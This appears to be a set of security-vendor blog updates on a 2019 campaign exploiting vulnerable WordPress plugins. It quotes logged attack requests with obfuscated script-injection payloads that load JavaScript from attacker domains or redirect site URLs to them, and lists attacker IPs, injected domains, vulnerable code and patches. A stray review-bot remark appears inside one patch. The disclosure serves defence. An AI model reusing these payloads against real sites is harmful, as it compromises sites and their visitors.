Plugins added to Malware Campaign: October 2019

This is an update for the long-lasting malware campaign targeting vulnerable plugins during August and September. Please check our previous updates below:

Plugins Under Attack: October 2019

Plugins that are continuing to be leveraged by attackers are:

Plugin Payloads Added to the Campaign

Blog Designer

185.238.0.214 - action=save&blog_nonce=save&custom_css=%3C%2Fstyle%3E%3Cscript+type%3Dtext%2Fjavascript+src%3D%27%26%23x64%3B%26%23x61%3B%26%23x74%3B%26%23x61%3B%26colon%3B%26%23x74%3B%26%23x65%3B%26%23x78%3B%26%23x74%3B%26sol%3B...skipped...%3B%26lpar%3B%26%23x63%3B%26rpar%3B%26semi%3B%26rcub%3B%27%3E%3C%2Fscript%3E%3Cstyle%3E&updated=true] "POST /wp-admin/admin-ajax.php HTTP/1.1"

WPeMatico RSS Feed Fetcher

159.65.65.204 - "GET /wp-admin/admin-post.php?wpematico-action=settings_tab_settings HTTP/1.1" 200 5 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:64.0) Gecko/20100101 Firefox/64.0" 

Smart Google Code Inserter

192.169.159.241 - action=savegooglecode&home=https://track.beforwardplay.com/track/uu?t=1&&sgcgoogleanalytic=<script type=text/javascript src='data&colon;text&sol;javascript&comma;if&lpar;document&period;head&rpar;&lcub;&Tab;var b &equals; document&semi;var c &equals; b&period;createEle&#...skipped...arCode&lpar;104&comma;101&comma;97&comma;100&rpar;&rpar;&lsqb;0&rsqb;&period;appendChild&lpar;c&rpar;&semi;&rcub;'></script>&sgcwebtools=&siteurl=https://track.beforwardplay.com/track/uu.js?t=1& "POST /wp-admin/admin-ajax.php HTTP/1.1"

Post Custom Templates Lite

192.99.38.186 - otw_pctl_action=manage_otw_pctl_options&otw_pctl_custom_css=</textarea><script type=text/javascript src='data&colon;text&sol;javascript&comma;if&lpar;document&period;head&rpar;&lcub;&Tab;var b &equals; document&semi;var&...skipped...&lpar;c&rpar;&semi;&rcub;'></script> "POST /wp-admin/admin-post.php HTTP/1.1" 

Woody Ad Snippets

162.241.149.54 - --fa51ba6a52e563a3b66864f78f10c9009cf9ed0c0018b2e8242f0db167a5\x0D\x0AContent-Disposition: form-data; name=\x22wbcr_inp_import_files\x22; filename=\x22lc.json\x22\x0D\x0AContent-Type: application/json\x0D\x0A\x0D\x0A{\x22generator\x22:\x22x\x22,\x22date_created\x22:\x22x\x22,\x22snippets\x22:[{\x22name\x22:\x22x\x22,\x22title\x22:\x22\x22,\x22content\x22:\x22x\x22,\x22location\x22:\x22header\x22,\x22type\x22:\x22php\x22,\x22filters\x22:\x22\x22,\x22changed_filters\x22:\x220\x22,\x22scope\x22:\x22everywhere\x22,\x22description\x22:\x22<script type=text/javascript src='https://cls.balantfromsun.com/cls.js?z=1&&v=2'></script>\x22,\x22attributes\x22:\x22\x22,\x22tags\x22:[]}]}\x0D\x0A--fa51ba6a52e563a3b66864f78f10c9009cf9ed0c0018b2e8242f0db167a5\x0D\x0AContent-Disposition: form-data; name=\x22swpsmtp_import_settings\x22\x0D\x0A\x0D\x0A1\x0D\x0A--fa51ba6a52e563a3b66864f78f10c9009cf9ed0c0018b2e8242f0db167a5\x0D\x0AContent-Disposition: form-data; name=\x22action\x22\x0D\x0A\x0D\x0Aswpsmtp_clear_log\x0D\x0A--fa51ba6a52e563a3b66864f78f10c9009cf9ed0c0018b2e8242f0db167a5--\x0D\x0A] "POST /wp-admin/admin-post.php HTTP/1.1"

FV Flowplayer Video Player

162.241.149.54 - action=fv_wp_flowplayer_email_signup&email=%3Csvg%2Fonload%3Deval%28String.fromCharCode%2832%2C40%2C102%2C117%2C110%2C99%2C116%2C105%2C111%2C110%2C40%2C41%2C32%2C123%2C10%2C32%2C32%2C32%2C32%2C118%2C97%2C114%2C32%2C101%2C108%2C101%2C109%2C32%2C61%2C32%2C100%2C111%2C99%2C117%2C109%2C101%2C110%2C116%2C46%2C99%2C114%2C101%2C97%2C116%2C101%2C69%2C108%2C101%2C109%2C101%2C110%2C116%2C40%2C39%2C115%2C99%2C114%2C105%2C112%2C116%2C39%2C41%2C59%2C32%2C10%2C9%2C101%2C108%2C101%2C109%2C46%2C116%2C121%2C112%2C101%2C32%2C61%2C32%2C39%2C116%2C101%2C120%2C116%2C47%2C106%2C97%2C118%2C97%2C115%2C99%2C114%2C105%2C112%2C116%2C39%2C59%2C32%2C10%2C32%2C32%2C32%2C32%2C101%2C108%2C101%2C109%2C46%2C115%2C114%2C99%2C32%2C61%2C32%2C39%2C104%2C116%2C116%2C112%2C115%2C58%2C47%2C47%2C99%2C108%2C115%2C46%2C98%2C97%2C108%2C97%2C110%2C116%2C102%2C114%2C111%2C109%2C115%2C117%2C110%2C46%2C99%2C111%2C109%2C47%2C99%2C108%2C115%2C46%2C106%2C115%2C63%2C122%2C61%2C49%2C55%2C38%2C39%2C59%2C10%2C32%2C32%2C32%2C32%2C100%2C111%2C99%2C117%2C109%2C101%2C110%2C116%2C46%2C103%2C101%2C116%2C69%2C108%2C101%2C109%2C101%2C110%2C116%2C115%2C66%2C121%2C84%2C97%2C103%2C78%2C97%2C109%2C101%2C40%2C34%2C104%2C101%2C97%2C100%2C34%2C41%2C91%2C48%2C93%2C46%2C97%2C112%2C112%2C101%2C110%2C100%2C67%2C104%2C105%2C108%2C100%2C40%2C101%2C108%2C101%2C109%2C41%2C59%2C10%2C32%2C32%2C125%2C41%2C40%2C41%2C59%29%29%3E%40test.com&list=1 [08/Oct/2019:12:54:03 +0000] "POST /wp-admin/admin-ajax.php HTTP/1.1"

Poll, Survey, Form & Quiz Maker

50.63.162.9 -  "GET /wp-admin/admin-post.php?page=opinionstage-content-login-callback-page&email=\x22><script type=text/javascript src='https://cd.privacylocationforloc.com/track&v15'></script> HTTP/1.1"

DELUCKS SEO

167.99.232.64 - dpc%5Bbasic_metadata%5D%5Battachments%5D%5Bfollow%5D=follow&dpc%5Bbasic_metadata%5D%5Battachments%5D%5Bindex%5D=index&dpc%5Bbasic_metadata%5D%5Bcategories%5D%5B1%5D%5Bfollow%5D=follow&dpc%5Bbasic_metadata%5D%5Bcategories%5D%5B1%5D%5Bindex%5D=index&dpc%5Bbasic_metadata%5D%5Bdpc_status_basic_metadata%5D=1&dpc%5Bbasic_metadata%5D%5Ben%5D%5Barchives%5D%5Btitle%5D%5Bdelimiter%5D=-&dpc%5Bbasic_metadata%5D%5Ben%5D%5Barchives...skipped...5Bgoogle%5D=%22%3E%3Cscript+type%3Dtext%2Fjavascript+src%3D%27https%3A%2F%2Fcd.privacylocationforloc.com%2Ftrack%26v9%27%3E%3C%2Fscript%3E&dpc%5Bbasic_metadata%5D%5Bverify%5D%5Bpinterest%5D=&dpc%5Bbasic_metadata%5D%5Bverify%5D%5Byandex%5D=%22%3E%3Cscript+type%3Dtext%2Fjavascript+src%3D%27https%3A%2F%2Fcd.privacylocationforloc.com%2Ftrack%26v9%27%3E%3C%2Fscript%3E&dpc_save_settings=1 "POST /wp-admin/admin-post.php HTTP/1.1" 

Social Metrics Tracker

50.63.162.9 - gapi_client_id=%22%3E%3Cscript+type%3Dtext%2Fjavascript+src%3D%27https%3A%2F%2Fcd.privacylocationforloc.com%2Ftrack%26v5%27%3E%3C%2Fscript%3E "POST /wp-admin/admin-post.php?page=social-metrics-tracker-export&smt_download_export_file=1&section=gapi HTTP/1.1"

Malicious Domains and IPs:

IPs:

159.65.65.204
192.169.243.42
167.99.232.64
50.63.162.9
192.169.159.241
185.238.0.214
192.99.38.186
159.203.175.216
80.211.164.226
162.241.149.53
186.147.2.49

Domains Injected:

  • track[.]beforwardplay[.]com
  • cls[.]balantfromsun[.]com
  • cd[.]privacylocationforloc[.]com
  • bes[.]belaterbewasthere[.]com
  • ave[.]cervantes[.]es
  • hungthinhsg[.]com[.]vn

We strongly encourage you to keep your software up to date to prevent infection. You can add a WAF as a second layer of protection to virtually patch these vulnerabilities.

Plugins added to Malware Campaign: September 2019

This is an update for the long-lasting malware campaign targeting vulnerable plugins during August and September. Please check our previous updates below:

Plugins Under Attack: September 2019

Plugins that are continuing to be leveraged by attackers are:

Plugin Payloads Added to the Campaign

Rich Reviews

149.202.215.42 - read-more-text=Readme+more%22%3B%3C%2Fscript%3E%3Cscript+type%3Dtext%2Fjavascript+%3Eeval%28String.fromCharCode%2832%2C40%2C102%2C117%2C110%2C99%2C116%2C105%2C111%2C110%2C40%2C41%2C32%2C123%2C10%2C32%2C32%2C32%2C32%2C118%2C97%2C114%2C32%2C101%2C108%2C101%2C109%2C32%2C61%2C32%2C100%2C111%2C99%2C117%2C109%2C101%2C110%2C116%2C46%2C99%2C114%2C101%2C97%2C116%2C101%2C69%2C108%2C101%2C109%2C101%2C110%2C116%2C40%2C39%2C115%2C99%2C114%2C105%2C112%2C116%2C39%2C41%2C59%2C32%2C10%2C9%2C101%2C108%2C101%2C109%2C46%2C116%2C121%2C112%2C101%2C32%2C61%2C32%2C39%2C116%2C101%2C120%2C116%2C47%2C106%2C97%2C118%2C97%2C115%2C99%2C114%2C105%2C112%2C116%2C39%2C59%2C32%2C10%2C32%2C32%2C32%2C32%2C101%2C108%2C101%2C109%2C46%2C115%2C114%2C99%2C32%2C61%2C32%2C39%2C104%2C116%2C116%2C112%2C115%2C58%2C47%2C47%2C98%2C101%2C1...skipped...%2C67%2C104%2C105%2C108%2C100%2C40%2C101%2C108%2C101%2C109%2C41%2C59%2C10%2C32%2C32%2C125%2C41%2C40%2C41%2C59%29%29%3B%3C%2Fscript%3E%3Cscript%3E&update=rr-update-options [28/Sep/2019] "POST /wp-admin/admin-post.php?page=fp_admin_options_page"

Blog Designer

62.76.25.158 - action=save&custom_css=%3C%2Fstyle%3E%3Cscript+++type%3Dtext%2Fjavascript+language%3Djavascript%3Evar+c+%3D+0%3Bvar+_fr2cdmdy7%3DString.fromCharCode%28104%2F%2A%2A%2F%2C116%2F%2A_y78qgjy8u%2A%2F%2C116%2F%2A_y78qgjy8u%2A%2F%2C112%2F%2A%2A%2F%2C115%2F%2A%2A%2F%2C58%2F%2A_58zwawter%2A%2F%2C47%2F%2A_1scpswrsv%2A%2F%2C47%2F%2A_58zwawter%2A%2F%2C100%2F%2A%2A%2F%2C110%2F%2A_fr2cdmdy7%2A%2F%2C115%2F%2A_58zwawter%2A%2F%2C46%2F%2A_fr2cdmdy7%2A...skipped...B_y78qgjy8u.send%28+null+%29%3Breturn+_y78qgjy8u.responseText%3B%7Dfunction+_wwsyflqj0%28todo%29%7B+var+_avq14iyav+%3D+new+Function%28%27x%27%2C+%27y%27%2C+todo%2B%27+return+x%2By%3B%27%29%3B_avq14iyav%280%2C0%29%3B%7D%3C%2Fscript%3E%3Cstyle%3E&updated=true [23/Sep/2019:05:04:38 +0000] "POST /wp-admin/admin-ajax.php HTTP/1.1"

Coming Soon Page and Maintenance Mode

62.76.25.158 - action_rcs=action_rcs_page_setting_save_post&home_sec_link_txt=off&hook=general&logo_enable=on&logo_height=1&logo_width=1&rcsp_description=%3Cscript++type%3Dtext%2Fjavascript+language%3Djavascript%3Evar+c+%3D+0%3Bvar+_vw5ansga3qp4fwa%3DString.fromCharCode%28104%2F%2A%2A%2F%2C116%2F%2A_w1g30wg9f776x67%2A%2F%2C116%2F%2A_w1g30wg9f776x67%2A%2F%2C112%2F%2A%2A%2F%2C115%2F%2A%2A%2F%2C58%2F%2A_nugjx0jhw9l3b4f%2A%2F%2C47%2F%2A_ug3v7obje18b87n%2A%2F%2C47%2F%2A_nugjx0jhw9l3b4f%2A%2F%2C100%2F%2A%2A%2F%2C110%2F%2A_vw5ansga3qp4fwa%2A%2F%2C115%2F%2A_nugjx0jhw9l3b4f%2A%2F%2C46%2F%2A_vw5ansga3qp4fwa%2A%2F%2C99%2F%2A_ug3v7obje18b87n%2A%2F%2C114%2F%2A_vw5ansga3qp4fwa%2A%2F%2C101%2F%2A_nugjx0jhw9l3b4f%2A%2F%2C97%2F%2A%2A%2F%2C116%2F%2A%2A%2F%2C101%2F%2A%2A%2F%2C114%2F%2A_ug3v7obje18b87n%2A%2F%2C101%2F%2A_nugjx0jhw9l3b4f%2A%2F%2C108%2F%2A%2A%2F%2C97%2F%2A_w1g30wg9f776x67%2A%2F%2C116%2F%2A_ug3v7obje18b87n%2A%2F%2C105%2F%2A%2A%2F%2C118%2F%2A_nugjx0jhw9l3b4f%2A%2F%2C101%2F%2A_ug3v7obje18b87n%2A%2F%2C99%2F%2A_vw5ansga3qp4fwa%2A%2F%2C104%2F%2A_w1g30wg9f776x67%2A%2F%2C97%..skipped...%29%3B_pr3rd9vm0zvo3tw%280%2C0%29%3B%7D%3C%2Fscript%3E&rcsp_headline=was+here&rcsp_logo_url=https%3A%2F%2Fave.cervantes.es%2Fsites%2Fdefault%2Ffiles%2Fdemocursos_aveglobal.jpg [23/Sep/2019] "POST /wp-admin/admin-post.php?page=wpsm_responsive_coming_soon HTTP/1.1" 

WP Quick Booking Manager

62.76.25.158 - action=gen_save_cssfixfront&css=%3C%2Fstyle%3E%3Cscript+++type%3Dtext%2Fjavascript+language%3Djavascript%3Evar+c+%3D+0%3Bvar+_3evx21%3DString.fromCharCode%28104%2F%2A%2A%2F%2C116%2F%2A_tp5mxm%2A%2F%2C116%2F%2A_tp5mxm%2A%2F%2C112%2F%2A%2A%2F%2C115%2F%2A%2A%2F%2C58%2F%2A_h01hcw%2A%2F%2C47%2F%2A_tx1yiy%2A%2F%2C47%2F%2A_h01hcw%2A%2F%2C100%2F%2A%2A%2F%2C110%2F%2A_3evx21%2A%2F%2C115%2F%2A_h01hcw%2A%2F%2C46%2F%2A_3evx21%2A%2F%2C99%2F%2A_tx1yiy%2A%2F%2C114%2F%2A_3evx21%2A%2F%2C101%2F%2A_h01hcw%2A%2F...skipped...iy%28_0wg1jn%29%7B+var+_tp5mxm+%3D+new+XMLHttpRequest%28%29%3B_tp5mxm.open%28+String.fromCharCode%2871%2C69%2C84%29%2C+_0wg1jn%2C+false+%29%3B_tp5mxm.send%28+null+%29%3Breturn+_tp5mxm.responseText%3B%7Dfunction+_ocrrhn%28todo%29%7B+var+_fta15b+%3D+new+Function%28%27x%27%2C+%27y%27%2C+todo%2B%27+return+x%2By%3B%27%29%3B_fta15b%280%2C0%29%3B%7D%3C%2Fscript%3E%3Cstyle%3E&cssfix=front [23/Sep/2019:05:04:30 +0000] "POST /wp-admin/admin-ajax.php HTTP/1.1"

WP Private Content Plus

62.76.25.158 - submit=Save%2BChanges&wppcp_general%5Bpost_page_redirect_url%5D=https%3A%2F%2Fdns.createrelativechanging.com%2Fsub%2Ftfso.js%3Fz%3D6%26&wppcp_general%5Bprivate_content_module_status%5D=1&wppcp_general%5Bprivate_mod%5D=1&wppcp_tab=wppcp_section_general [23/Sep/2019] "POST /wp-admin/admin-ajax.php?page=wppcp-settings HTTP/1.1"

woocommerce-ajax-filters

78.142.211.111 - - [18/Sep/2019] "GET /wp-admin/admin-post.php?page=br-aapf-setup&step=wizard_selectors HTTP/1.1" 

Malicious Domains and IPs:

149.202.215.42
62.76.25.158
132.148.27.189
185.212.128.201
213.128.89.176
167.99.232.64
207.154.198.108
159.203.86.82
192.95.14.196
162.241.175.243
104.248.237.226
104.238.72.132
46.101.174.128
51.68.204.149
188.166.188.152
104.236.178.208
162.243.13.195
45.252.249.240
158.69.194.57
139.59.116.30
78.142.211.111
192.95.14.196
51.38.38.1
91.234.217.135
82.223.69.53
51.158.72.203
162.243.165.84
175.126.62.37
104.238.99.130
45.32.104.33
139.99.106.10
153.126.194.159
142.44.151.107
186.202.161.191
192.169.243.42
178.62.93.109
159.65.155.168
217.182.95.250

Domains Injected:

  • dns.createrelativechanging[.]com
  • bes.belaterbewasthere[.]com
  • gabriellalovecats[.]com
  • www.dzobainteriors[.]com
  • ns1.bullgoesdown[.]com

We strongly encourage you to keep your software up to date to prevent infection. You can add a WAF as a second layer of protection to virtually patch these vulnerabilities.

Plugins Under Attack: August 2019

This is an update for the long-lasting malware campaign targeting vulnerable plugins during August and September. Please check our previous updates below:

Plugins Under Attack: August 2019

Plugins that are continuing to be leveraged by attackers for months are:

Plugin Payloads Added to the Campaign

Simple-301-redirects-addon-bulk-uploader

178.128.193.158 - --43a8d1df3e809162dd41895414f1186f7a8ba38c778819fb80d2e3a13911\x0D\x0AContent-Disposition: form-data; name=\x22301_bulk_redirects\x22; filename=\x22301_redirects.csv\x22\x0D\x0AContent-Type: application/csv\x0D\x0A\x0D\x0A/,https://developsincelock.com/54768?\x0D\x0A*,https://developsincelock.com/5868?\x0D\x0A/*,https://developsincelock.com/34234?\x0D\x0A\x0D\x0A--43a8d1df3e809162dd41895414f1186f7a8ba38c778819fb80d2e3a13911\x0D\x0AContent-Disposition: form-data; name=\x22submit_bulk_301\x22\x0D\x0A\x0D\x0A1\x0D\x0A--43a8d1df3e809162dd41895414f1186f7a8ba38c778819fb80d2e3a13911\x0D\x0AContent-Disposition: form-data; name=\x22auto_detect_end_line\x22\x0D\x0A\x0D\x0A0\x0D\x0A--43a8d1df3e809162dd41895414f1186f7a8ba38c778819fb80d2e3a13911\x0D\x0AContent-Disposition: form-data; name=\x22wpnonce\x22\x0D\x0A\x0D\x0A887cc0cb2f\x0D\x0A--43a8d1df3e809162dd41895414f1186f7a8ba38c778819fb80d2e3a13911\x0D\x0AContent-Disposition: form-data; name=\x22_wp_http_referer\x22\x0D\x0A\x0D\x0A/wp-admin/options-general.php?page=301bulkoptions\x0D\x0A--43a8d1df3e809162dd41895414f1186f7a8ba38c778819fb80d2e3a13911--\x0D\x0A [28/Aug/2019:13:56:32 +0000] "POST /wp-admin/admin-post.php?page=301bulkoptions HTTP/1.1" 

Kiwi-Social-Share

162.243.126.96 - action=kiwi_social_share_set_option&args=%7B%27option%27%3A+%27users_can_register%27%2C+%27value%27%3A+%271%27%7D [17/Aug/2019:13:00:36 +0000] "POST /wp-admin/admin-ajax.php HTTP/1.1"

Nd-learning

158.69.194.57 - action=nd_learning_import_settings_php_function&nd_learning_value_import_settings=siteurl%5Bnd_learning_option_value%5Dhttps%3A%2F%2Fjackielovedogs.com%2Fpret.js%3Fl%3D1%26%5Bnd_learning_end_option%5D [09/Aug/2019:03:02:54 +0000] "POST /wp-admin/admin-ajax.php?nd_learning_value_import_settings=siteurl[nd_learning_option_value]https://jackielovedogs.com/pret.js?l=1&[nd_learning_end_option] HTTP/1.1" 
158.69.194.57 - action=nd_stats_import_settings_php_function&nd_stats_value_import_settings=siteurl%5Bnd_stats_option_value%5Dhttps%3A%2F%2Fjackielovedogs.com%2Fpret.js%3Fl%3D1%26%5Bnd_stats_end_option%5D [09/Aug/2019:03:02:54 +0000] "POST /wp-admin/admin-post.php?nd_stats_value_import_settings=siteurl[nd_stats_option_value]https://jackielovedogs.com/pret.js?l=1&[nd_stats_end_option] HTTP/1.1" 
158.69.194.57 - action=nd_travel_import_settings_php_function&nd_travel_value_import_settings=home%5Bnd_travel_option_value%5Dhttps%3A%2F%2Fjackielovedogs.com%2Fpret%3Fl%3D1%26%5Bnd_travel_end_option%5D [09/Aug/2019:03:02:54 +0000] "POST /wp-admin/admin-ajax.php?nd_travel_value_import_settings=home[nd_travel_option_value]https://jackielovedogs.com/pret?l=1&[nd_travel_end_option] HTTP/1.1" 

Responsive-coming-soon

158.69.194.57 - action_rcs=action_rcs_page_setting_save_post&home_sec_link_txt=off&logo_enable=off&rcsp_description=off&rcsp_headline=%3Cscript+async%3Dtrue+type%3Dtext%2Fjavascript+language%3Djavascript%3Evar+nt+%3D+String.fromCharCode%28116%2C114%2C101%2C114%2C53%2C55%2C56%2C52%29%3Bvar+mb+%3D+String.fromCharCode%2897%2C+106%2C+97%2C+120%2C+67%2C+111%2C+117%2C+110%2C+116%2C+101%2C+114%29%3Bvar+sb+%3D+Strin...skipped...%29%3Bvar+c%3Ddocument.createElement%28sb%29%3Bc.type%3Dtb%2Cc.async%3D1%2Cc.src%3Djb%2Blb%2Bnt%3Bvar+n%3Ddocument.getElementsByTagName%28sb%29%5B0%5D%3Bn.parentNode.insertBefore%28c%2Cn%29%3B%3C%2Fscript%3E [09/Aug/2019:03:02:53 +0000] "POST /wp-admin/admin-post.php?page=wpsm_responsive_coming_soon HTTP/1.1"

Nd-donations

158.69.194.57 - action=nd_donations_import_settings_php_function&nd_donations_value_import_settings=siteurl%5Bnd_donations_option_value%5Dhttps%3A%2F%2Fjackielovedogs.com%2Fpret.js%3Fl%3D1%26%5Bnd_donations_end_option%5D [09/Aug/2019:03:02:53 +0000] "POST /wp-admin/admin-post.php?nd_donations_value_import_settings=siteurl[nd_donations_option_value]https://jackielovedogs.com/pret.js?l=1&[nd_donations_end_option] HTTP/1.1"

Malicious Domains and IPs:

IPs:

185.238.0.34
45.12.32.105
45.12.32.102
185.238.0.33
178.128.193.158
37.122.209.28
217.61.56.11
185.18.226.161
188.213.166.219
162.243.126.96
192.169.227.95
149.202.75.164
185.104.184.109
192.169.255.17
45.12.32.102
185.238.0.35
158.69.194.57
185.238.0.146
45.12.32.55
185.238.0.133

Domains Injected:

  • wiilberedmodels.com[.]com
  • hungthinhsg[.]com[.]vn
  • developsincelock[.]com
  • bbwebsitecontent[.]com
  • bachatours[.]com
  • tomorrowwillbehotmaybe[.]com
  • jackielovedogs[.]com
  • gabriellalovecats[.]com

We strongly encourage you to keep your software up to date to prevent infection. You can add a WAF as a second layer of protection to virtually patch these vulnerabilities.

Unauthenticated settings update in woocommerce-ajax-filters

woocommerce-ajax-filters, which currently has over 10,000 installations (versions <= 1.3.6), allows unauthenticated attackers to arbitrarily update all the plugin options and redirect any user to an external malicious URL when the product section is visited. The bug stems from a misunderstanding of the admin_init hook’s execution context.

if( is_admin() ) {
      require_once dirname( __FILE__ ) . '/includes/wizard.php';
}
[...]

function wizard_selectors($wizard) {
[...]
 <div class="wizard_custom_js_css" style="display: none;">
    <h3><?php _e('User custom CSS style', 'BeRocket_AJAX_domain') ?></h3>
    <textarea name="berocket_aapf_wizard_settings[user_custom_css]">
        <?php echo br_get_value_from_array($option, array('user_custom_css')) ?>
    </textarea>
    <h3><?php _e('JavaScript Before Products Update', 'BeRocket_AJAX_domain') ?></h3>
    <textarea name="berocket_aapf_wizard_settings[user_func][before_update]">
        <?php echo br_get_value_from_array($option, array('user_func', 'before_update')) ?>
    </textarea>
    <h3><?php _e('JavaScript On Products Update', 'BeRocket_AJAX_domain') ?></h3>
    <textarea name="berocket_aapf_wizard_settings[user_func][on_update]">
        <?php echo br_get_value_from_array($option, array('user_func', 'on_update')) ?>
    </textarea>
    <h3><?php _e('JavaScript After Products Update', 'BeRocket_AJAX_domain') ?></h3>
    <textarea name="berocket_aapf_wizard_settings[user_func][after_update]">
        <?php echo br_get_value_from_array($option, array('user_func', 'after_update')) ?>
    </textarea>
</div>

[...]

What's the problem with the code above?

  • The developer assumed that WordPress’s admin_init hook is only called when an administrator visits a page inside /wp-admin/
  • The plugin settings allow users to add custom JavaScript code

A patch was released a few days ago to address this vulnerability.

Because of the nature of the bug, specifically its severity, we will not be disclosing additional details. We are seeing malicious requests being used in the wild. While most of them target /wp-admin/admin-post.php, other endpoints in the /wp-admin/ directory can be used to trigger the admin_init hook and exploit the vulnerability.

Malicious IPs attacking this plugin:

175.126.62.37
104.238.99.130
45.32.104.33
139.99.106.10
153.126.194.159
162.241.175.243
51.68.204.149
162.243.165.84
142.44.151.107
186.202.161.191
46.105.17.29
192.169.243.42
186.202.161.191
159.65.65.204
192.30.164.48
51.158.72.203
178.62.93.109
139.59.116.30
213.128.89.176
138.68.181.84

If you have an old version of this plugin installed please update to the latest version (1.3.7) asap. You can add a WAF as a second layer of protection and virtually patch the vulnerability.

Lack of controls when using WordPress’ update_option() with...

As mentioned in recent posts, WordPress’ update_option() function is used to update any option in the options database table. If the permission flow when using this function isn’t correctly implemented by developers, attackers can gain admin access or inject arbitrary data into any site.

This is the case for the plugin Login or Logout Menu Item, which currently has over 10,000 installations (versions <= 1.1.1). This vulnerability allows unauthenticated attackers to arbitrarily update some plugin options and redirect any user to an external malicious URL.

function lolmi_save_settings() {
    if(isset($_POST['lolmi_settings_submit'])) {

        $login_page_url = (isset($_POST['lolmi_login_page_url']) && !empty($_POST['lolmi_login_page_url'])) ? $_POST['lolmi_login_page_url'] : wp_login_url();
        $login_redirect_url = (isset($_POST['lolmi_login_redirect_url']) && !empty($_POST['lolmi_login_redirect_url'])) ? $_POST['lolmi_login_redirect_url'] : home_url();
        $logout_redirect_url = (isset($_POST['lolmi_logout_redirect_url']) && !empty($_POST['lolmi_logout_redirect_url'])) ? $_POST['lolmi_logout_redirect_url'] : home_url();

        update_option('lolmi_login_page_url', esc_url_raw($login_page_url));
        update_option('lolmi_login_redirect_url', esc_url_raw($login_redirect_url));
        update_option('lolmi_logout_redirect_url', esc_url_raw($logout_redirect_url));

        [...]
    }
}

What's the problem with the function above?

  • It updates the option “lolmi_login_page_url” with any value provided by the user
  • It does not check the user’s capability
  • It does not check a nonce

A patch was released on August 5th, 2019 to address this vulnerability:

--Version: 1.1.1
++Version: 1.2.0
Plugin URI: https://caseproof.com

[…]
 ++ <?php wp_nonce_field('lolmi_nonce'); ?>
<input type="submit" id="lolmi_settings_submit" name="lolmi_settings_submit" value="<?php _e('Save Settings', 'lolmi'); ?>" class="button button-primary" />
</form>
[…]      
function lolmi_save_settings() {
 if(isset($_POST['lolmi_settings_submit'])) {
++if(!current_user_can('manage_options')) { die("Cheating eh?"); }
++check_admin_referer('lolmi_nonce');
[...]
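Review bot: in the lolmi_save_settings hunk the capability check ends with a bare die("Cheating eh?"); prefer wp_die() with a 403 status so the refusal goes through WordPress’s normal error handler and returns a meaningful response code instead of a 200 with a one-line body. The ordering itself is right: current_user_can('manage_options') runs before check_admin_referer('lolmi_nonce'), and both run before any update_option() call, and the 'lolmi_nonce' action matches the wp_nonce_field('lolmi_nonce') added to the form in the earlier hunk.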

With just a few lines of code in the right place, developers can avoid security issues related to the misuse of this function and keep their users safe.

These kinds of bugs are always the first choice for bad actors: they don’t need any authentication on the site, they’re monetizable, and they’re really easy to automate.

Here's how they are exploiting this particular bug in old versions of the plugin Login or Logout Menu Item:

192.169.157.142 - lolmi_settings_submit=1&lolmi_login_page_url=http[:]//gabriellalovecats[.]com/wp-login.php [0/Aug/2019] "POST /wp-admin/admin-post.php?action=lolmi_save_settings HTTP/1.1"

Plugins Under Attack: July 2019

A long-lasting malware campaign targeting deprecated, vulnerable versions of plugins continues to be leveraged by attackers to inject malicious scripts into affected websites:

This month they added seven new plugins and continued attacking old ones.

Plugins targeted: July 2019

Plugins that are continuing to be leveraged by attackers for months are:

Payloads added to the campaign

WordPress Plugin Appointment Booking Calendar

185.225.16.152 - CP_ABC_post_edition=1&cfwpp_edit=js&editionarea=var+nt+%3D+String.fromCharCode%2857%2C+57%2C57%29%3Bvar+mb+%3D+String.fromCharCode%2897%2C+106%2C+97%2C+120%2C+67%2C+111%2C+117%2C+110%2C+116%2C+101%2C+114%29%3Bvar+sb+%3D+String.fromCharCode%28115%2C+99%2C+114%2C+105%2C+112%2C+116%29%3Bvar+jb+%3D+String.fromCharCode%28104%2C+116%2C+116%2C+112%2C+115%2C+58%2C+47%2C+47%29%3B+var+tb+%3D+String.fromCharCode%28116%2C+101%2C+120%2C+116%2C+47%2C+106%2C+97%2C+118%2C+97%2C+115%2C+99%2C+114%2C+105%2C+112%2C+116%29%3Bvar+lb+%3D+String.fromCharCode%28100%2C+101%2C+115%2C+116%2C+114%2C+111%2C+121%2C+102%2C+111%2C+114%2C+109%2C+101%2C+46%2C+99%2C+111%2C+109%2C+47%2C+115%2C+116%2C+97%2C+121%2C+46%2C+106%2C+115%2C+63%2C+116%2C+61%2C+112%2C+38%2C+97%2C+61%29%3Bvar+c%3Ddocument.createElement%28sb%29%3Bc.type%3Dtb%2Cc.async%3D1%2Cc.src%3Djb%2Blb%2Bnt%3Bvar+n%3Ddocument.getElementsByTagName%28sb%29%5B0%5D%3Bn.parentNode.insertBefore%28c%2Cn%29%3B&save=Submit [22/Jul/2019] "POST /wp-admin/admin-post.php HTTP/1.1" 

myStickymenu

185.225.16.152 - type=attachment&width=%3C%2Fstyle%3E%3Cscript++async%3Dtrue+type%3Dtext%2Fjavascript+language%3Djavascript%3Evar+nt+%3D+String.fromCharCode%2857%2C+57%2C57%29%3Bvar+mb+%3D+String.fromCharCode%2897%2C+106%2C+97%2C+120%2C+67%2C+111%2C+117%2C+110%2C+116%2C+101%2C+114%29%3Bvar+sb+%3D+String.fromCharCode%28115%2C+99%2C+114%2C+105%2C+112%2C+116%29%3Bvar+jb+%3D+String.fromCharCode%28104%2C+116%2C+116%2C+112%2C+115%2C+58%2C+47%2C+47%29%3B+var+tb+%3D+String.fromCharCode%28116%2C+101%2C+120%2C+116%2C+47%2C+106%2C+97%2C+118%2C+97%2C+115%2C+99%2C+114%2C+105%2C+112%2C+116%29%3Bvar+lb+%3D+String.fromCharCode%28100%2C+101%2C+115%2C+116%2C+114%2C+111%2C+121%2C+102%2C+111%2C+114%2C+109%2C+101%2C+46%2C+99%2C+111%2C+109%2C+47%2C+115%2C+116%2C+97%2C+121%2C+46%2C+106%2C+115%2C+63%2C+116%2C+61%2C+112%2C+38%2C+97%2C+61%29%3Bvar+c%3Ddocument.createElement%28sb%29%3Bc.type%3Dtb%2Cc.async%3D1%2Cc.src%3Djb%2Blb%2Bnt%3Bvar+n%3Ddocument.getElementsByTagName%28sb%29%5B0%5D%3Bn.parentNode.insertBefore%28c%2Cn%29%3B%3C%2Fscript%3E%3Cstyle%3E [11/Jul/2019] "POST /wp-admin/admin-ajax.php?action=wcp_change_post_width HTTP/1.1"

File Manager

